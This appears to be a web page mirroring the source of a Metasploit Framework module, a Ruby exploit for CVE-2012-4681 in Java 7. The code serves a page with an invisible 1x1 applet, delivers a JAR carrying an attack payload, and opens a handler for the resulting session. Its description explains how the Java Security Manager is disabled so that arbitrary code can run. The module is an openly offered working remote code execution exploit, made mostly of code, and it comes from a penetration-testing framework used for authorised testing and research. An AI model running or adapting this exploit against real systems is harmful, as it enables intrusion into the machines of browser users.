Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_exec.rb
31362 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  # include Msf::Exploit::Remote::BrowserAutopwn

12
  # autopwn_info({ :javascript => false })

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Java 7 Applet Remote Code Execution',

19
        'Description' => %q{

20
          The exploit takes advantage of two issues in JDK 7: The ClassFinder and

21
          MethodFinder.findMethod().  Both were newly introduced in JDK 7.  ClassFinder is a

22
          replacement for classForName back in JDK 6. It allows untrusted code to obtain a

23
          reference and have access to a restricted package in JDK 7, which can be used to

24
          abuse sun.awt.SunToolkit (a restricted package).  With sun.awt.SunToolkit, we can

25
          actually invoke getField() by abusing findMethod() in Statement.invokeInternal()

26
          (but getField() must be public, and that's not always the case in JDK 6) in order

27
          to access Statement.acc's private field, modify AccessControlContext, and then

28
          disable Security Manager. Once Security Manager is disabled, we can execute

29
          arbitrary Java code.

30


31
          Our exploit has been tested successfully against multiple platforms, including:

32
          IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.

33
        },

34
        'License' => MSF_LICENSE,

35
        'Author' => [

36
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory

37
          'James Forshaw', # Vulnerability discovery according to Oracle's advisory

38
          'jduck',         # metasploit module

39
          'sinn3r',        # metasploit module

40
          'juan vazquez'   # metasploit module

41
        ],

42
        'References' => [

43
          [ 'CVE', '2012-4681' ],

44
          [ 'OSVDB', '84867' ],

45
          [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],

46
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],

47
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],

48
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ],

49
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html' ],

50
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/27/lets-start-the-week-with-a-new-java-0day' ],

51
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=852051']

52
        ],

53
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

54
        'Targets' => [

55
          [

56
            'Generic (Java Payload)',

57
            {

58
              'Arch' => ARCH_JAVA,

59
              'Platform' => 'java'

60
            }

61
          ],

62
          [

63
            'Windows Universal',

64
            {

65
              'Arch' => ARCH_X86,

66
              'Platform' => 'win'

67
            }

68
          ],

69
          [

70
            'Linux x86',

71
            {

72
              'Arch' => ARCH_X86,

73
              'Platform' => 'linux'

74
            }

75
          ]

76
        ],

77
        'DefaultTarget' => 0,

78
        'DisclosureDate' => '2012-08-26',

79
        'Notes' => {

80
          'Reliability' => UNKNOWN_RELIABILITY,

81
          'Stability' => UNKNOWN_STABILITY,

82
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

83
        }

84
      )

85
    )

86
  end

87


88
  def on_request_uri(cli, request)

89
    if !request.uri.match(/\.jar$/i)

90
      if !request.uri.match(%r{/$})

91
        send_redirect(cli, get_resource + '/', '')

92
        return

93
      end

94


95
      print_status("#{name} handling request")

96


97
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

98
      return

99
    end

100


101
    paths = [

102
      [ 'Exploit.class' ]

103
    ]

104


105
    p = regenerate_payload(cli)

106


107
    jar = p.encoded_jar

108
    paths.each do |path|

109
      1.upto(path.length - 1) do |idx|

110
        full = path[0, idx].join('/') + '/'

111
        if !(jar.entries.map { |e| e.name }.include?(full))

112
          jar.add_file(full, '')

113
        end

114
      end

115
      fd = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2012-4681', path), 'rb')

116
      data = fd.read(fd.stat.size)

117
      jar.add_file(path.join('/'), data)

118
      fd.close

119
    end

120


121
    print_status('Sending Applet.jar')

122
    send_response(cli, jar.pack, { 'Content-Type' => 'application/octet-stream' })

123


124
    handler(cli)

125
  end

126


127
  def generate_html

128
    html = '<html><head></head>'

129
    html += '<body>'

130
    html += '<applet archive="Exploit.jar" code="Exploit.class" width="1" height="1">'

131
    html += '</applet></body></html>'

132
    return html

133
  end

134
end

135


136